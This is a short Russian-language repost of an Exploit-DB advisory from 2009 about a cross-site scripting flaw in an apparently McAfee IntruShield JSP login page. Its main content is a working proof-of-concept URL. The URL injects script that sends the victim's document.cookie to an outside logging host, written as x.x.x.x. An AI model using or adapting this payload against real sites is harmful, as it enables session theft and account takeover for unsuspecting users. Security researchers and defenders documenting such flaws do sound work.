- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10059
- Проверка EDB
-
- Пройдено
- Автор
- DANIEL KING
- Тип уязвимости
- WEBAPPS
- Платформа
- JSP
- CVE
- N/A
- Дата публикации
- 2009-11-12
Код:
To exploit this issue, an attacker must entice an unsuspecting user to view a malicious webpage.
The following proof of concept uses a cross-site scripting attack to leverage this issue:
https://www.example.com/intruvert/jsp/module/Login.jsp?password=&Login%2bID=&node=&iaction=precreatefcb1
4%22%3E%3Cscript%3Enew%20Image().src=%22http://x.x.x.x/mcafee/log.cgi?c=%22%2BencodeURI(document.cookie);%3C/script%3E8b3283a1e57- Источник
- www.exploit-db.com
